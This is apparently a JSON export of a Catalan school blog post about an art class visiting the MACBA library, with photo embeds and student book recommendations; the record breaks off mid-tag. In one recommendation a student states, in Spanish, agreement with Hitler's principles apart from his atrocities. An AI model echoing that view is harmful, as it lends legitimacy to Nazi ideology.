{"id":1947,"date":"2016-04-27T15:30:30","date_gmt":"2016-04-27T13:30:30","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1947"},"modified":"2018-05-06T07:14:51","modified_gmt":"2018-05-06T05:14:51","slug":"la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/","title":{"rendered":"Moltes recomanacions a la Biblioteca del MACBA pel Treball de Recerca."},"content":{"rendered":"<p>Redacci\u00f3 ___\u00a0[ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>Aprofitant la sortida del 27 d&#8217;abril a la presentaci\u00f3 de l&#8217;<a href=\"https:\/\/apadrinaelmacba.wordpress.com\/\" target=\"_blank\">Apadrina 2016<\/a> a l&#8217;institut Miquel Tarradell (<a href=\"https:\/\/apadrinaelmacba.wordpress.com\/2016\/04\/27\/11-presentacio-del-projecte-a-la-trobada-de-lapadrina\/\" target=\"_blank\">enlla\u00e7 a la not\u00edcia<\/a>), un cop acabat vam aprofitar per visitar el centre d&#8217;estudis i documentaci\u00f3 del Macba a m\u00e9s de la seva <a href=\"http:\/\/macba.es\/ca\/biblioteca\" target=\"_blank\">biblioteca<\/a>.<\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"500\" data-dnt=\"true\">\n<p lang=\"ca\" dir=\"ltr\">Avui hem rebut la visita dels alumnes de 1r de Batxillerat Art\u00edstic de l&#39;Institut Consell de Cent 1\/2 <a href=\"https:\/\/t.co\/dM21X1sH0f\">pic.twitter.com\/dM21X1sH0f<\/a><\/p>\n<p>&mdash; MACBA | Museu | BCN (@MACBA_Barcelona) <a href=\"https:\/\/twitter.com\/MACBA_Barcelona\/status\/725345041036668929?ref_src=twsrc%5Etfw\">April 27, 2016<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>La Marta, encarregada de l&#8217;arxiu i biblioteca, ens va explicar amb tota cura com funcionen els espais per tal de consultar qualsevol obra, sobretot, de cara als possibles treballs de recerca que es puguin nodrir o complementar.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-25\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2120 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-25-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (25)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-25-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-25-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-25.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-27\/\" rel=\"attachment wp-att-2121\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2121\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-27-300x207.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (27)\" width=\"289\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-27-300x207.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-27-768x531.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-27.jpg 1000w\" sizes=\"auto, (max-width: 289px) 100vw, 289px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-6\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2108 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-6-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (6)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-6-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-6-768x511.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-6.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-21\/\" rel=\"attachment wp-att-2119\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2119 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-21-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (21)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-21-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-21-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-21.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-16\/\" rel=\"attachment wp-att-2117\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2117 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-16-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (16)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-16-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-16-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-16.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-15\/\" rel=\"attachment wp-att-2116\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2116 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-15-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (15)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-15-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-15-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-15.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<blockquote><p>La Biblioteca reuneix cat\u00e0legs, llibres d\u2019assaig, publicacions peri\u00f2diques, documents audiovisuals i material de difusi\u00f3 sobre artistes, entitats, etc. A la secci\u00f3 de reserva s\u2019hi destinen les publicacions que requereixen condicions de consulta m\u00e9s restringides, ja sigui per les seves caracter\u00edstiques f\u00edsiques \u2012seria el cas dels fotollibres i les publicacions de formats especials, per exemple\u2012 o b\u00e9 per la seva raresa, com passa amb certs cat\u00e0legs d\u2019exposici\u00f3 o amb primeres edicions de publicacions de rellev\u00e0ncia hist\u00f2rica. Igualment, la Biblioteca facilita l\u2019acc\u00e9s dels usuaris a diverses bases de dades especialitzades de consulta online. (<a href=\"http:\/\/www.macba.cat\/ca\/biblioteca\" target=\"_blank\">Extret de la web<\/a>)<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-14\/\" rel=\"attachment wp-att-2115\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2115 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-14-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (14)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-14-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-14-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-14.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-13\/\" rel=\"attachment wp-att-2114\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2114 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-13-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (13)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-13-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-13-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-13.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-10\/\" rel=\"attachment wp-att-2112\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2112 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-10-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (10)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-10-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-10-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-10.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-9\/\" rel=\"attachment wp-att-2110\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2110 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-9-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (9)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-9-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-9.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-7\/\" rel=\"attachment wp-att-2109\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2109 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-7-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (7)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-7-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-7-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-7.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-2\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2106 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-2-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-2-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-2.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>La informaci\u00f3 que tot l&#8217;alumnat va trobar va ser molt interessant, cadasc\u00fa dins el seu \u00e0mbit va sortir molt content\/a i alg\u00fa fins hi tot, amb el carnet de la biblioteca per tornar-hi quan vulgui. El professor Francesc Casabella va demanar a tots els assistents que recomanessin dos llibres, i son justament aquests -ordenats per alumnat- els apunts que es poden trobar a continuaci\u00f3.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-5\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2107 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-5-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (5)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-5-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-5-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-5.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-19\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2118 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-19-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (19)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-19-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-19-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-19.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba-11\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2113 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-11-300x200.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-11-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-11.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-petita-20160427_134904\/\" rel=\"attachment wp-att-2105\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2105\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-petita-20160427_134904.jpg\" alt=\"C\u00f2pia de petita 20160427_134904\" width=\"490\" height=\"275\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-petita-20160427_134904.jpg 1000w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-petita-20160427_134904-300x168.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-petita-20160427_134904-768x431.jpg 768w\" sizes=\"auto, (max-width: 490px) 100vw, 490px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/copia-de-biblioteca-macba\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2122\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA.jpg\" alt=\"C\u00f2pia de Biblioteca MACBA\" width=\"412\" height=\"275\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA.jpg 1000w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/C\u00f2pia-de-Biblioteca-MACBA-768x512.jpg 768w\" sizes=\"auto, (max-width: 412px) 100vw, 412px\" \/><\/a><\/p>\n<p>Noelia Soler ___________________________________________<\/p>\n<blockquote><p>Avui al MACBA hem hagut d\u2019escollir dos llibres que ens cridessin l\u2019atenci\u00f3 i escriure una mena de sinopsi per tal d\u2019explicar en tan sols unes l\u00ednies del que va cadascun.<br \/>\nEn el meu cas, m&#8217;he decantat per\u00a0&#8220;LA ETERNIDAD VULNERABLE\u201d de Jeffrey Fraenkel.\u00a0Aquest llibre tracta de cinquanta fotografies fetes per persones de camps totalment diferents,\u00e9s a dir, fetes per cient\u00edfics, simples aficionats interessats en un tema en concret i artistes.<br \/>\nCadascuna d\u2019aquestes imatges tenen el seu significat;la seva hist\u00f2ria, etc. Estan fetes d\u2019una manera tant meticulosa que fa que t\u2019abstreguis de\u00a0la fotografia, buscant un sentit a tot all\u00f2 que veus.<\/p>\n<p>L&#8217;altre llibre\u00a0que he escollit tracta sobre &#8220;MOVIMENTS DE L&#8217;ART MODERN &#8211;\u00a0POP ART&#8221;, i mostra\u00a0les mil i una imatges fetes amb aquesta t\u00e8cnica, des del comen\u00e7ament amb\u00a0Andy Warhol i la seva famosa\u00a0Marilyn Monroe.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/9788478071364-us-300\/\" rel=\"attachment wp-att-2040\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2040\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/9788478071364-us-300-265x300.jpg\" alt=\"9788478071364-us-300\" width=\"265\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/9788478071364-us-300-265x300.jpg 265w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/9788478071364-us-300.jpg 300w\" sizes=\"auto, (max-width: 265px) 100vw, 265px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/4940410\/\" rel=\"attachment wp-att-2041\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2041\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/4940410-282x300.jpg\" alt=\"4940410\" width=\"282\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/4940410-282x300.jpg 282w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/4940410.jpg 318w\" sizes=\"auto, (max-width: 282px) 100vw, 282px\" \/><\/a><\/p><\/blockquote>\n<p>Hug Salvat\u00a0___________________________________________<\/p>\n<blockquote><p>&#8220;RULE MA VILLE&#8221;, \u00e9s un llibre que parla de l\u2019evoluci\u00f3 de l\u2019skate en les ciutats de Fran\u00e7a. Tamb\u00e9 ensenya cr\u00f2quis d\u2019skateparks.<\/p>\n<p>&#8220;SURFERS SOULIES SKINHEADS &amp; SKATERS&#8221; \u00e9s un llibre que parla sobre les modes del carrer durant molts anys i com han anat canviant al llarg del temps.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/les-nouveaux-commanditaires\/\" rel=\"attachment wp-att-2033\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2033\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/les-nouveaux-commanditaires--203x300.jpg\" alt=\"les-nouveaux-commanditaires-\" width=\"203\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/les-nouveaux-commanditaires--203x300.jpg 203w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/les-nouveaux-commanditaires-.jpg 500w\" sizes=\"auto, (max-width: 203px) 100vw, 203px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/412rvhhktal-_sy344_bo1204203200_\/\" rel=\"attachment wp-att-2032\">\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2032\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/412RVHHKTAL._SY344_BO1204203200_-200x300.jpg\" alt=\"412RVHHKTAL._SY344_BO1,204,203,200_\" width=\"200\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/412RVHHKTAL._SY344_BO1204203200_-200x300.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/412RVHHKTAL._SY344_BO1204203200_.jpg 231w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a><\/p><\/blockquote>\n<p>Vicky Tortato\u00a0___________________________________________<\/p>\n<blockquote><p>Los siguentes libros hablan de un argumento que siempre me ha interesado: La segunda guerra mundial.<\/p>\n<p>&#8220;ARTE E IDEOLOG\u00cdA DEL NAZISMO&#8221;\u00a0En \u00e9l se cuenta la idea que ten\u00eda Hitler, ense\u00f1ando los principios -de los cuales estoy de acuerdo, dejando las barbaries que quer\u00eda hacer y hizo-.\u00a0Me parece un libro interesante porque puede hacernos comprender sus intenciones y porque despu\u00e9s acab\u00f3 perdiendo.<\/p>\n<p>&#8220;LA EST\u00c9TICA NAZI&#8221; ofrece un ventana sobre lo que le quer\u00eda Hitler para sus ideales de sociedad, analiza sus met\u00e1foras y como \u00e9l se llamaba a el mismo `cristo aleman`. Aqu\u00ed podemos ver donde, segundo el F\u00fchrer el arte y la religi\u00f3n se encuentran para conducir a la `idea y forma` de un mundo ut\u00f3pico.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/la-biblioteca-del-macba-un-indret-amb-moltes-recomanacions\/attachment\/40634344\/\" rel=\"attachment wp-att-2043\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2043\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/40634344-225x300.jpg\" alt=\"40634344\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/40634344-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/06\/40634344.jpg 720w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a>\u00a0\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2042\" 